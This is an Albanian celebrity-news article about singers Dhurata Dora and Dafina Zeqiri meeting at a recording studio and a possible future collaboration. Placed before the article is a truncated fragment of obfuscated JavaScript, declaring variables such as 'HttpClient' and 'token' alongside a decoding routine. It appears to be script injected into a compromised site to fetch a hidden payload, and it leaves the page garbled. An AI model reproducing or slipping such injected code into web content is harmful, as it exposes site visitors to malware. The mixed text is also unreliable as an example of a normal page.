;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Çka i bashkoi Dhuratën dhe Dafinën?

By

Në sytë e shumëkujt, ato kanë ngjajshmëri të madhe në mënyrën se si është përshkuar zhvillimi i tyre në karrierë.

Të dyja të rritura jashtë Kosovës, të rikthyera në origjinë ku edhe kapën suksesin me plot hite, ato sot përbëjnë dy prej këngëtareve më të suksesshme në skenën muzikore shqiptare.

Si rrjedhojë, të shumtë janë fansat që do donin një bashkëpunim mes dy shoqeve, Dhurata Dorës dhe Dafina Zeqirit. Megjithatë, një bashkëpunim i mundshëm nuk ishte arsyeja e takimit të djeshëm të vajzave në foton që bëri xhiron në internet.

Ato thjesht janë takuar tek destinacioni i shumë këngëtareve, studio Sellma dhe Kaci ku edhe kanë shkrepur foton përpara nisjes së agjendës së ngjeshur të koncerteve.

Kujtojmë se e pyetur javë më parë në NIN të Klan Kosova, Dhurata Dora e kishte pranuar se ekziston ideja e një bashkëpunimi mes saj dhe Dafina Zeqirit por që ishte lënë të diskutohet më vonë gjatë vitit nga stafi i dy këngëtareve. /Prive.al/

 

Artikuj të ngjashëm